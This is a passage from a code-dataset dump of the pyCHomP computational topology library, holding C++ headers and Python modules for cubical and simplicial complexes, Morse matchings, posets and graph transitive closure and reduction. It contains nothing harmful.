x(D, -1);\n Integer offset = 0;\n for ( Integer d = 0, bit = 1; d < D; ++ d, bit <<= (Integer) 1 ) if ( shape & bit ) offset -= PV()[d];\n record(offset);\n while (1) {\n for ( Integer d = 0, bit = 1; d <= D; ++ d, bit <<= (Integer) 1 ) {\n if ( d == D ) return result;\n if ( shape & bit ) {\n if ( ++x[d] == 2 ) { \n x[d] = -1; \n offset -= 2*PV()[d];\n } else { \n offset += PV()[d];\n record(offset);\n break;\n }\n }\n }\n }\n }\n\n /// Features\n\n /// left\n /// Give cell to \"left\" in given dimension. \n /// Note: uses \"twisted\" periodic boundary conditions (inconsistent with periodic and acyclic conditions)\n Integer\n left ( Integer cell, Integer dim ) const {\n Integer shape = cell_shape(cell);\n Integer bit = ((Integer)1) << dim;\n Integer position = cell % type_size();\n Integer type_offset = type_size() * TS() [ shape ^ bit ];\n if ( not (shape & bit) ) position -= PV()[dim];\n if (position < 0) position += type_size();\n return position + type_offset;\n }\n\n /// right\n /// Give cell to \"right\" in given dimension. \n /// Note: uses \"twisted\" periodic boundary conditions (inconsistent with periodic and acyclic conditions)\n Integer\n right ( Integer cell, Integer dim ) const {\n Integer shape = cell_shape(cell);\n Integer bit = ((Integer)1) << dim;\n Integer position = cell % type_size();\n Integer type_offset = type_size() * TS() [ shape ^ bit ];\n if ( (shape & bit) ) position += PV()[dim];\n if (position >= type_size()) position -= type_size();\n return position + type_offset;\n }\n\n /// leftfringe\n /// cells for which left coboundary wraps around if periodic\n bool\n leftfringe ( Integer cell ) const {\n Integer shape = cell_shape(cell);\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( (shape & bit) ) continue;\n if ( coordinate.rem == 0 ) return true;\n }\n return false;\n }\n\n /// rightfringe\n /// Return true if right boundary would wrap around if periodic \n bool\n rightfringe ( Integer cell ) const {\n Integer shape = cell_shape(cell);\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( not (shape & bit) ) continue;\n if ( coordinate.rem + 1 == boxes()[d]) return true;\n }\n return false;\n }\n\n /// mincoords\n /// Return integer with 2^i bit set for each dimension i for which \n /// cell is at maximum coordinate for dimension i\n Integer\n mincoords ( Integer cell ) const {\n Integer result = 0;\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( coordinate.rem == 0 ) result |= bit;\n }\n return result;\n }\n\n /// maxcoords\n /// Return integer with 2^i bit set for each dimension i for which \n /// cell is at maximum coordinate for dimension i\n Integer\n maxcoords ( Integer cell ) const {\n Integer result = 0;\n lldiv_t coordinate = {(int64_t)cell, 0}; // (quotient, remainder), see std::div\n for ( Integer d = 0, bit = 1; d < dimension(); ++ d, bit <<= 1L ) {\n coordinate = std::lldiv(static_cast<Integer>(coordinate.quot), boxes()[d] ); \n if ( coordinate.rem + 1 == boxes()[d]) result |= bit;\n }\n return result;\n }\n\n /// boxes\n /// Number of boxes across in each dimension\n std::vector<Integer> const&\n boxes ( void ) const {\n return boxes_;\n }\n\n /// coordinates\n /// Given a cell index, \n /// returns ( x_0, x_1, ..., x_{dim-1} )\n std::vector<Integer>\n coordinates ( Integer cell ) const {\n std::vector<Integer> result ( dimension() );\n for ( Integer d = 0; d < dimension(); ++ d ) {\n result[d] = cell % boxes()[d];\n cell /= boxes()[d];\n }\n return result;\n }\n\n /// barycenter\n /// Give integer barycenter ( doubled coordinates with +1 for directions with extent)\n std::vector<Integer>\n barycenter ( Integer cell ) const {\n auto result = coordinates(cell);\n auto shape = cell_shape(cell);\n for ( Integer i = 0, bit = 1; i < dimension(); ++ i, bit <<= (Integer) 1 ) {\n result[i] <<= (Integer) 1;\n if ( shape & bit ) result[i] += 1;\n }\n return result;\n }\n\n /// shape_begin\n Iterator\n shape_begin ( Integer shape ) const {\n return Iterator(TS()[shape] * type_size());\n }\n\n /// shape_end\n Iterator\n shape_end ( Integer shape ) const {\n return Iterator(TS()[shape] * ( type_size() + 1));\n }\n\n /// cell_type\n /// Give shape code\n /// Interpretation: if ( shape & ( 1 << i ) ) { then the cell has extent in dimension i }\n Integer\n cell_type ( Integer cell ) const {\n return cell / type_size();\n }\n\n /// cell_shape\n /// Give shape code\n /// Interpretation: if ( shape & ( 1 << i ) ) { then the cell has extent in dimension i }\n Integer\n cell_shape ( Integer cell ) const {\n Integer shape = ST() [ cell_type(cell) ]; \n return shape;\n }\n\n /// cell_pos\n Integer\n cell_pos ( Integer cell ) const {\n return cell % type_size();\n }\n\n /// cell_index\n Integer\n cell_index ( std::vector<Integer> const& coordinates, \n Integer shape ) {\n Integer cell = 0;\n for ( Integer d = dimension() - 1; d >= 0; -- d ) {\n cell *= boxes()[d];\n cell += coordinates[d];\n }\n cell += TS() [ shape ] * type_size();\n return cell;\n }\n\n /// cell_dim\n /// Return dimension of cell\n Integer\n cell_dim ( Integer cell ) const {\n return popcount_(cell_shape(cell));\n }\n\n /// operator ==\n bool\n operator == ( CubicalComplex const& rhs ) const {\n return boxes() == rhs.boxes();\n }\n\n /// operator <\n bool\n operator < ( CubicalComplex const& rhs ) const {\n return std::lexicographical_compare(boxes().begin(), boxes().end(),\n rhs.boxes().begin(), rhs.boxes().end());\n }\n\n /// operator <<\n friend std::ostream & operator << ( std::ostream & stream, CubicalComplex const& stream_me ) {\n stream << \"CubicalComplex([\";\n for ( auto x : stream_me.boxes() ) stream << x << \",\";\n return stream << \"])\";\n }\n\n /// print_cell (for debugging )\n void\n print_cell (Integer cell_index) const {\n std::cout << cell_index << \"\\n\";\n std::cout << \" coordinates(\" << cell_index << \") = [\";\n for ( auto x : coordinates(cell_index) ) std::cout << x << \", \"; std::cout << \"]\\n\";\n std::cout << \" shape(\" << cell_index << \") = \" << cell_shape(cell_index) << \"\\n\";\n }\n\n Integer\n type_size ( void ) const {\n return type_size_;\n }\n\n /// TS\n /// Given shape, return type\n std::vector<Integer> const&\n TS ( void ) const {\n return type_from_shape_;\n }\n\n /// TS\n /// Given type, return shape\n std::vector<Integer> const&\n ST ( void ) const {\n return shape_from_type_;\n }\n\n /// PV\n /// Return \n std::vector<Integer> const&\n PV ( void ) const {\n return place_values_;\n }\n\nprivate:\n\n Integer\n popcount_ ( Integer x ) const {\n // http://lemire.me/blog/2016/05/23/the-surprising-cleverness-of-modern-compilers/\n Integer pcnt = 0; \n while(x != 0) { x &= x - 1; ++pcnt; } \n return pcnt;\n }\nprivate:\n std::vector<Integer> boxes_;\n std::vector<Integer> place_values_;\n std::vector<Integer> shape_from_type_;\n std::vector<Integer> type_from_shape_;\n std::vector<Integer> topstar_offset_;\n Integer num_types_;\n Integer type_size_;\n};\n\n/// std::hash<CubicalComplex>\nnamespace std {\n template<> struct hash<CubicalComplex> {\n typedef CubicalComplex argument_type;\n typedef std::size_t result_type;\n result_type operator()(argument_type const& complex) const {\n using pychomp::hash_value;\n using pychomp::hash_combine;\n std::size_t seed = 0;\n for ( auto x : complex.boxes() ) {\n hash_combine(seed,hash_value(x));\n } \n return seed;\n }\n };\n}\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nCubicalComplexBinding(py::module &m) {\n py::class_<CubicalComplex, std::shared_ptr<CubicalComplex>, Complex>(m, \"CubicalComplex\")\n .def(py::init<>())\n .def(py::init<std::vector<Integer> const&>())\n .def(\"boxes\", &CubicalComplex::boxes)\n .def(\"coordinates\", &CubicalComplex::coordinates)\n .def(\"barycenter\", &CubicalComplex::barycenter) \n .def(\"cell_type\", &CubicalComplex::cell_type)\n .def(\"cell_shape\", &CubicalComplex::cell_shape)\n .def(\"cell_pos\", &CubicalComplex::cell_pos)\n .def(\"cell_dim\", &CubicalComplex::cell_dim)\n .def(\"cell_index\", &CubicalComplex::cell_index)\n .def(\"left\", &CubicalComplex::left)\n .def(\"right\", &CubicalComplex::right)\n .def(\"leftfringe\", &CubicalComplex::leftfringe)\n .def(\"rightfringe\", &CubicalComplex::rightfringe)\n .def(\"mincoords\", &CubicalComplex::mincoords)\n .def(\"maxcoords\", &CubicalComplex::maxcoords)\n .def(\"parallelneighbors\", &CubicalComplex::parallelneighbors);\n}\n"
},
{
"alpha_fraction": 0.6087431907653809,
"alphanum_fraction": 0.6174863576889038,
"avg_line_length": 31.678571701049805,
"blob_id": "58fac7cc40de7e1d3d990faf46ec9ae91b1f9a64",
"content_id": "0e8d920b2fb770b5cc5dc1d08a9b015ba8c39d59",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 915,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 28,
"path": "/src/pychomp/TransitiveClosure.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# TransitiveClosure.py\n# Shaun Harker\n# MIT LICENSE\n# 2018-03-10\n\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.TopologicalSort import *\n\ndef TransitiveClosure( G ):\n \"\"\" Return a new graph which is the transitive reduction of a DAG G \"\"\"\n # Algorithm. Compute longest-path distance between each pair of vertices. \n # Then, construct a graph consisting length-one longest paths.\n TS = TopologicalSort(G.vertices(), G.adjacencies)\n result = DirectedAcyclicGraph()\n for v in G.vertices():\n result.add_vertex(v) \n for v in G.vertices():\n # Find vertices reachable from from v\n reachable = set()\n reachable.add(v)\n for u in reversed(TS):\n if u in reachable:\n for w in G.adjacencies(u):\n reachable.add(w)\n for u in reachable:\n if u != v:\n result.add_edge(v, u)\n return result\n"
},
{
"alpha_fraction": 0.5632529854774475,
"alphanum_fraction": 0.5763052105903625,
"avg_line_length": 33.31034469604492,
"blob_id": "c78b45e91b352172dd378533b2c6bed0eeb975fb",
"content_id": "98d3a89e3dbe3a28b4c19093fa7925e2fd730535",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 996,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 29,
"path": "/src/pychomp/TransitiveReduction.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "# TransitiveReduction.py\n# Shaun Harker\n# MIT LICENSE\n# 2018-03-10\n\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.TopologicalSort import *\n\ndef TransitiveReduction( G ):\n \"\"\" Return a new graph which is the transitive reduction of a DAG G \"\"\"\n # Algorithm. Compute longest-path distance between each pair of vertices. \n # Then, construct a graph consisting length-one longest paths.\n TS = TopologicalSort(G.vertices(), G.adjacencies)\n result = DirectedAcyclicGraph()\n for v in G.vertices():\n result.add_vertex(v) \n for v in G.vertices():\n # Find single-source longest paths from v\n lp = { u : -1 for u in G.vertices() }\n lp[v] = 0\n for u in reversed(TS):\n val = lp[u]\n if val >= 0:\n for w in G.adjacencies(u):\n if u != w:\n lp[w] = max(val + 1, lp[w])\n for u in [ w for w in lp if lp[w] == 1 ]:\n result.add_edge(v, u)\n return result\n\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.8079208135604858,
"avg_line_length": 32.53333282470703,
"blob_id": "8b8bdc596fa9304c8f91dd2a5c326c99c4c0dc4f",
"content_id": "1c8573df481d17825d45b7790d0fd74e1c9fb787",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 15,
"path": "/src/pychomp/__init__.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### __init__.py\n### MIT LICENSE 2016 Shaun Harker\n\nfrom pychomp._chomp import *\n#from pychomp.Braids import *\nfrom pychomp.CondensationGraph import *\nfrom pychomp.FlowGradedComplex import *\nfrom pychomp.TopologicalSort import *\nfrom pychomp.DirectedAcyclicGraph import *\nfrom pychomp.InducedSubgraph import *\nfrom pychomp.TransitiveReduction import *\nfrom pychomp.TransitiveClosure import *\nfrom pychomp.Poset import *\nfrom pychomp.StronglyConnectedComponents import *\nfrom pychomp.DrawGradedComplex import *\n\n\n"
},
{
"alpha_fraction": 0.6183172464370728,
"alphanum_fraction": 0.6200700998306274,
"avg_line_length": 25.546510696411133,
"blob_id": "c1f7e8963fbb1e6142948b924c16729e1fffdb41",
"content_id": "b060369bc8d178a85773864cfb5ced6bce96633b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2282,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 86,
"path": "/src/pychomp/Poset.py",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "### Poset.py\n### MIT LICENSE 2016 Shaun Harker\n\nimport graphviz\n\nclass Poset:\n \"\"\"\n Represents a poset\n \"\"\"\n def __init__(self, graph):\n \"\"\" \n Create a Poset P from a DAG G such that x <= y in P iff there is a path from x to y in G \n \"\"\"\n self.vertices_ = set(graph.vertices())\n #self.descendants_ = graph.transitive_closure()\n #self.ancestors_ = self.descendants_.transpose()\n self.children_ = graph.transitive_reduction()\n self.parents_ = self.children_.transpose()\n\n def __iter__(self):\n \"\"\"\n Allows for the semantics\n [v for v in poset]\n \"\"\"\n return iter(self.vertices())\n\n def vertices(self):\n \"\"\" \n Return the set of elements in the poset \n \"\"\"\n return self.vertices_\n \n def parents(self, v):\n \"\"\" \n Return the immediate predecessors of v in the poset \n \"\"\"\n return self.parents_.adjacencies(v)\n \n def children(self, v):\n \"\"\" \n Return the immediate successors of v in the poset \n \"\"\"\n return self.children_.adjacencies(v)\n \n def ancestors(self, v):\n \"\"\" \n Return the set { u : u < v } \n \"\"\"\n return self.ancestors_.adjacencies(v)\n \n def descendants(self, v):\n \"\"\" \n Return the set { u : v < u } \n \"\"\"\n return self.descendants_.adjacencies(v)\n \n def less(self, u, v):\n \"\"\" \n Return True if u < v, False otherwise \n \"\"\"\n return u in self.ancestors(v)\n \n def maximal(self, subset):\n \"\"\" \n Return the set of elements in \"subset\" which are maximal \n \"\"\"\n return frozenset({ u for u in subset if not any ( self.less(u,v) for v in subset ) })\n \n def _repr_svg_(self):\n \"\"\"\n Return svg representation for visual display\n \"\"\"\n return graphviz.Source(self.children_.graphviz())._repr_svg_()\n\ndef LatticeOfDownsets(poset):\n \"\"\" Generate from poset the Hasse diagram of the poset of down-sets of \"poset\" ordered by inclusion \"\"\"\n lattice = Graph()\n recursion_stack = [poset.maximal(poset.vertices())]\n while recursion_stack:\n clique = recursion_stack.pop()\n for v in clique:\n parent_clique = poset.maximal(clique.difference([v]).union(poset.parents(v)))\n if parent_clique not in lattice.vertices():\n recursion_stack.append (parent_clique)\n lattice.add_edge (parent_clique,clique, str(v))\n return lattice"
},
{
"alpha_fraction": 0.5713991522789001,
"alphanum_fraction": 0.5784050822257996,
"avg_line_length": 27.886905670166016,
"blob_id": "25499b233a5f95c7101686ac436a0cc876e2802e",
"content_id": "deea466fd9537a1715c4a7c7dd7949b0de4c1b14",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4853,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 168,
"path": "/src/pychomp/_chomp/include/GenericMorseMatching.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// GenericMorseMatching.h\n/// Shaun Harker\n/// 2018-02-16\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"GradedComplex.h\"\n#include \"MorseMatching.h\"\n\nclass GenericMorseMatching : public MorseMatching {\npublic:\n /// GenericMorseMatching\n GenericMorseMatching ( std::shared_ptr<Complex> complex_ptr ) {\n std::shared_ptr<GradedComplex> graded_complex_ptr (new GradedComplex(complex_ptr, [](Integer i){return 0;}));\n construct(graded_complex_ptr);\n }\n\n /// GenericMorseMatching\n // DRY mistake -- only a few lines differ. \n GenericMorseMatching ( std::shared_ptr<GradedComplex> graded_complex_ptr ) {\n construct(graded_complex_ptr);\n }\n\n /// construct\n void\n construct ( std::shared_ptr<GradedComplex> graded_complex_ptr ) {\n GradedComplex const& graded_complex = *graded_complex_ptr;\n Complex const& complex = *graded_complex.complex();\n Integer N = complex.size();\n mate_.resize(N,-1);\n priority_.resize(N);\n Integer num_processed = 0;\n std::vector<Integer> boundary_count (N);\n std::unordered_set<Integer> coreducible;\n std::unordered_set<Integer> ace_candidates;\n\n auto bd = [&](Integer x) {\n Chain result;\n auto x_val = graded_complex.value(x);\n for ( auto y : complex.boundary({x}) ) {\n auto y_val = graded_complex.value(y);\n if ( y_val > x_val ) {\n throw std::logic_error(\"graded_complex closure property failed line MorseMatching line 98\");\n }\n if ( x_val == y_val ) result += y;\n }\n return result;\n };\n\n auto cbd = [&](Integer x) {\n Chain result;\n auto x_val = graded_complex.value(x);\n for ( auto y : complex.coboundary({x}) ) {\n if ( x_val == graded_complex.value(y) ) result += y;\n }\n return result;\n };\n\n for ( auto x : complex ) {\n boundary_count[x] = bd(x).size();\n switch ( boundary_count[x] ) {\n case 0: ace_candidates.insert(x); break;\n case 1: coreducible.insert(x); break;\n }\n }\n\n auto process = [&](Integer y){\n priority_[y] = graded_complex.value(y)*complex.size() + num_processed ++;\n coreducible.erase(y);\n ace_candidates.erase(y);\n for ( auto x : cbd(y) ) {\n boundary_count[x] -= 1;\n switch ( boundary_count[x] ) {\n case 0: coreducible.erase(x); ace_candidates.insert(x); break;\n case 1: coreducible.insert(x); break;\n }\n }\n };\n\n while ( num_processed < N ) {\n if ( not coreducible.empty() ) {\n Integer K, Q;\n // Extract K\n auto it = coreducible.begin(); K = *it; coreducible.erase(it); // pop from unordered_set\n // Find mate Q\n for ( auto x : bd(K) ) if ( mate_[x] == -1 ) { Q = x; break; }\n if ( graded_complex.value(K) != graded_complex.value(Q) ) {\n throw std::logic_error(\"graded_complex error -- memory bug? MorseMatching line 132\");\n }\n mate_[K] = Q; mate_[Q] = K;\n process(Q); process(K);\n } else {\n Integer A;\n // Error: what if there are zero ace candidates?\n auto it = ace_candidates.begin(); A = *it; ace_candidates.erase(it); // pop from unordered_set\n mate_[A] = A;\n process(A);\n }\n }\n\n // Compute critical cells\n Integer D = complex.dimension();\n //std::cout << \" Dimension = \" << dim_ << \"\\n\";\n begin_.resize(D+2);\n Integer idx = 0;\n for ( Integer d = 0; d <= D; ++ d ) {\n begin_[d] = idx;\n //std::cout << \" begin_[\" << d << \"] = \" << *begin_[d] << \"\\n\";\n for ( auto v : complex(d) ) {\n //std::cout << \" Inspecting cell \" << v << \" with mate \" << matching_ -> mate(v) << \"\\n\";\n if ( mate(v) == v ) { \n //std::cout << \" Identified cell \" << idx << \"\\n\";\n reindex_.push_back({v, idx});\n ++idx;\n }\n }\n }\n begin_[D+1] = idx;\n\n }\n\n /// critical_cells\n std::pair<BeginType const&,ReindexType const&>\n critical_cells ( void ) const {\n return {begin_,reindex_};\n }\n\n /// mate\n Integer\n mate ( Integer x ) const { \n return mate_[x];\n }\n\n /// priority\n Integer\n priority ( Integer x ) const { \n return priority_[x];\n }\n\nprivate:\n std::vector<Integer> mate_;\n std::vector<Integer> priority_;\n BeginType begin_;\n ReindexType reindex_;\n};\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nGenericMorseMatchingBinding(py::module &m) {\n py::class_<GenericMorseMatching, std::shared_ptr<GenericMorseMatching>>(m, \"GenericMorseMatching\")\n .def(py::init<std::shared_ptr<Complex>>())\n .def(py::init<std::shared_ptr<GradedComplex>>()) \n .def(\"mate\", &GenericMorseMatching::mate)\n .def(\"priority\", &GenericMorseMatching::priority);\n}\n"
},
{
"alpha_fraction": 0.5794553756713867,
"alphanum_fraction": 0.5829024314880371,
"avg_line_length": 26.112150192260742,
"blob_id": "d35e7eb3f9d8896fa844001f22c1b503ec3bd7e8",
"content_id": "7524665ae07a60a6c0995d229a907c61afda3247",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5802,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 214,
"path": "/src/pychomp/_chomp/include/MorseComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// MorseComplex.h\n/// Shaun Harker\n/// 2017-07-19\n/// MIT LICENSE\n\n#pragma once\n\n#include <memory>\n#include <queue>\n#include <tuple>\n#include <unordered_set>\n#include <vector>\n\n#include \"Integer.h\"\n#include \"Iterator.h\"\n#include \"Chain.h\"\n#include \"Complex.h\"\n#include \"MorseMatching.h\"\n\nclass MorseComplex : public Complex {\npublic:\n\n\n /// MorseComplex constructor\n MorseComplex ( std::shared_ptr<Complex> arg_base, \n std::shared_ptr<MorseMatching> arg_matching ) \n : base_(arg_base), matching_(arg_matching) {\n\n auto begin_reindex = matching_ -> critical_cells();\n begin_.clear();\n for ( auto i : begin_reindex.first ) {\n begin_.push_back(Iterator(i));\n }\n dim_ = begin_.size()-2;\n auto const& reindex = begin_reindex.second;\n\n for ( auto pair : reindex ) {\n include_.push_back(pair.first);\n }\n project_ = std::unordered_map<Integer, Integer>(reindex.begin(), reindex.end());\n\n // boundary\n bd_.resize(size());\n //std::cout << \"MorseComplex. There are \" << size() << \" cells.\\n\";\n //std::cout << \"MorseComplex. Computing boundary.\\n\";\n for ( auto ace : *this ) {\n //std::cout << \" Computing boundary for cell ace ==\" << ace << \"\\n\";\n //std::cout << \" include({ace}) = \" << include({ace}) << \"\\n\";\n bd_[ace] = lower(base()->boundary(include({ace})));\n //std::cout << \" bd(ace) = \" << bd_[ace] << \"\\n\";\n }\n\n //std::cout << \"MorseComplex. Computing coboundary.\\n\";\n // coboundary\n cbd_.resize(size());\n for ( auto ace : *this ) {\n for ( auto bd_cell : bd_[ace] ) cbd_[bd_cell] += ace;\n }\n\n }\n\n /// delegating constructor\n MorseComplex ( std::shared_ptr<Complex> arg_base ) \n : MorseComplex(arg_base, MorseMatching::compute_matching(arg_base)) {\n\n }\n\n /// boundary\n virtual Chain\n boundary ( Chain const& c ) const final {\n Chain result;\n for ( auto x : c ) result += bd_[x];\n return result;\n }\n\n /// coboundary\n virtual Chain\n coboundary ( Chain const& c ) const final {\n Chain result;\n for ( auto x : c ) result += cbd_[x];\n return result;\n }\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const final {\n for ( auto x : bd_[i] ) callback(x);\n };\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const final {\n for ( auto x : cbd_[i] ) callback(x);\n };\n \n\n // Feature\n\n /// base\n std::shared_ptr<Complex>\n base ( void ) const {\n return base_;\n }\n\n /// matching\n std::shared_ptr<MorseMatching>\n matching ( void ) const {\n return matching_;\n }\n\n /// include\n Chain\n include ( Chain const& c ) {\n Chain result;\n for ( auto x : c ) result += include_[x];\n return result;\n }\n\n /// project\n Chain\n project ( Chain const& c ) {\n Chain result;\n for ( auto x : c ) { \n if ( project_.count(x) > 0 ) result += project_[x];\n }\n return result;\n }\n\n /// lift\n Chain\n lift ( Chain const& c ) {\n Chain included = include ( c );\n Chain canonical; Chain gamma;\n std::tie(canonical, gamma) = flow ( base () -> boundary ( included ) );\n return included + gamma;\n }\n\n /// lower\n Chain\n lower ( Chain const& c ) {\n Chain canonical; Chain gamma;\n std::tie(canonical, gamma) = flow ( c );\n return project(canonical);\n }\n\n /// flow\n std::pair<Chain, Chain>\n flow ( Chain const& input ) const {\n // std::cout << \"MorseComplex::flow\\n\";\n Chain canonical, gamma;\n //std::unordered_set<Integer> queens;\n auto compare = [&](Integer x, Integer y){return matching_ -> priority(x) < matching_ -> priority(y);};\n std::priority_queue<Integer, std::vector<Integer>, decltype(compare)> priority ( compare );\n auto isQueen = [&](Integer x){ return x < matching_ -> mate(x); };\n\n auto process = [&](Integer x) {\n if ( isQueen(x) ) { //&& queens.count(x) == 0) {\n //queens . insert (x);\n priority . push (x);\n }\n canonical += x;\n };\n\n for ( auto x : input ) process(x);\n\n while ( not priority . empty () ) {\n // std::cout << \" Current chain = \" << canonical << \"\\n\";\n auto queen = priority.top(); priority.pop();\n if ( canonical . count ( queen ) == 0 ) continue;\n auto king = matching_ -> mate ( queen );\n gamma += king;\n // std::cout << \" Reducing queen \" << queen << \" with king \" << king << \" and priority \" << matching_->priority(queen) << \"\\n\";\n // std::cout << \" The boundary of king is \" << base()->boundary({king})<<\"\\n\";\n base() -> column(king, process);\n //process( base()->boundary({king}) );\n }\n // std::cout << \" COMPLETE chain = \" << canonical << \"\\n\";\n\n return {canonical, gamma};\n }\n\nprivate:\n std::shared_ptr<Complex> base_;\n std::shared_ptr<MorseMatching> matching_;\n std::vector<Integer> include_;\n std::unordered_map<Integer, Integer> project_;\n std::vector<Chain> bd_;\n std::vector<Chain> cbd_;\n};\n\n\n/// Python Bindings\n\n#include <pybind11/pybind11.h>\n#include <pybind11/stl.h>\nnamespace py = pybind11;\n\ninline void\nMorseComplexBinding(py::module &m) {\n py::class_<MorseComplex, std::shared_ptr<MorseComplex>, Complex>(m, \"MorseComplex\")\n .def(py::init<std::shared_ptr<Complex>, std::shared_ptr<MorseMatching>>())\n .def(py::init<std::shared_ptr<Complex>>())\n .def(\"include\", &MorseComplex::include)\n .def(\"project\", &MorseComplex::project)\n .def(\"lift\", &MorseComplex::lift)\n .def(\"lower\", &MorseComplex::lower)\n .def(\"flow\", &MorseComplex::flow)\n .def(\"base\", &MorseComplex::base)\n .def(\"matching\", &MorseComplex::matching);\n}\n"
},
{
"alpha_fraction": 0.5806451439857483,
"alphanum_fraction": 0.58588707447052,
"avg_line_length": 26.25274658203125,
"blob_id": "342717c830c576197e053222cf71711bf58f8b84",
"content_id": "3a52505ac657cf28fcf9131a373c830fe323ae76",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4960,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 182,
"path": "/src/pychomp/_chomp/include/SimplicialComplex.h",
"repo_name": "shaunharker/pyCHomP",
"src_encoding": "UTF-8",
"text": "/// SimplicialComplex.h\n/// Shaun Harker\n/// MIT LICENSE\n/// 2018-03-09\n\n// todo: sort simplices upon construction\n\n#pragma once\n\n#include \"common.h\"\n\ntypedef std::vector<Integer> Simplex;\n\ninline std::vector<Simplex>\nsimplex_boundary(Simplex const& s) {\n //std::cout << \"bd [\"; for ( auto v : s ) std::cout << v << \", \"; std::cout << \"] = \\n\";\n std::vector<Simplex> result;\n if ( s.size() > 1 ) {\n for ( Integer i = 0; i < s.size(); ++ i ) {\n Simplex t = s;\n t.erase(t.begin() + i);\n result.push_back(t);\n //std::cout << \" [\"; for ( auto v : t ) std::cout << v << \", \"; std::cout << \"] + \\n\";\n }\n }\n return result;\n}\n\n/// SimplicialComplex\nclass SimplicialComplex : public Complex {\npublic:\n\n /// SimplicialComplex\n SimplicialComplex ( std::vector<Simplex> const& maximal_simplices );\n\n /// column\n /// Apply \"callback\" method to every element in ith column of\n /// boundary matrix\n virtual void\n column ( Integer i, std::function<void(Integer)> const& callback) const final;\n\n /// row\n /// Apply \"callback\" method to every element in ith row of\n /// boundary matrix\n virtual void\n row ( Integer i, std::function<void(Integer)> const& callback) const final;\n\n /// simplex\n /// Given a cell index, return the associated Simplex\n Simplex\n simplex ( Integer i ) const;\n\n /// idx\n /// Given a simplex object, return the associated cell index.\n /// If simplex not in complex, return -1.\n Integer\n idx ( Simplex const& s ) const;\n\nprivate:\n std::unordered_map<Simplex, Integer, pychomp::hash<Simplex>> idx_;\n std::vector<Simplex> simplices_;\n std::vector<Chain> bd_;\n std::vector<Chain> cbd_;\n \n /// add_simplex\n bool\n add_simplex ( Simplex s );\n\n /// add_closed_simplex\n void\n add_closed_simplex ( Simplex const& s );\n \n};\n\ninline SimplicialComplex::\nSimplicialComplex (std::vector<Simplex> const& max_simplices) {\n //std::cout << \"SimplicialComplex \" << max_simplices.size() << \"\\n\";\n for ( auto s : max_simplices ) add_closed_simplex ( s );\n Integer N = simplices_.size();\n std::sort(simplices_.begin(), simplices_.end(), \n []( Simplex const& lhs, Simplex const& rhs ){ \n if (lhs.size() < rhs.size()) return true; \n if (lhs.size() > rhs.size()) return false;\n return std::lexicographical_compare(lhs.begin(), lhs.end(), rhs.begin(), rhs.end());\n });\n idx_.clear();\n for ( Integer i = 0; i < N; ++ i ) idx_[simplices_[i]] = i;\n dim_ = -1;\n bd_.resize(N);\n cbd_.resize(N);\n for ( Integer i = 0; i < N; ++ i ) {\n Simplex const& s = simplices_[i];\n Integer simplex_dim = s.size() - 1;\n // std::cout << \"i = \" << i << \"\\n\";\n // std::cout << \" s = [\"; for ( auto v : s ) std::cout << v << \", \"; std::cout << \"] + \\n\";\n // std::cout << \" simplex_dim == \" << simplex_dim << \"\\n\";\n // std::cout << \" dim_ == \" << dim_ << \"\\n\";\n if ( simplex_dim > dim_ ) {\n // std::cout << \"New dimension\\n\";\n ++ dim_;\n begin_.push_back(Iterator(i));\n // std::cout << \"Pushed \" << i << \" onto 